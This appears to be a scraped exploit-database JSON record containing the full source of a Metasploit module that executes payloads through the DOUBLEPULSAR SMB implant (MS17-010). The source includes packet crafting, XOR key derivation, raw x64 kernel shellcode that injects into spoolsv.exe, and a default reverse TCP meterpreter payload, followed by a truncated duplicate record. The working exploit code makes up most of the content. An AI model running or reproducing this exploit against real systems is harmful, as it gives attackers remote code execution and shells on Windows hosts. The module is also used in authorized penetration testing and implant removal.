["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96709", "SMNTC-96707", "SMNTC-96705", "SMNTC-96706", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-10-04T06:22:51", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-10-04T06:22:51", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-04] #"}, "lastseen": "2021-10-04T06:22:51", "differentElements": ["sourceData"], "edition": 34}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "d30694d93d20c7a703ef9a6460d32c5c", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-05T00:15:19", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:146236"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27802", "1337DAY-ID-27786"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:42030", "EDB-ID:41891"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96705", "SMNTC-96707", "SMNTC-96703", "SMNTC-96706", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-05T00:15:19", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-05T00:15:19", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < 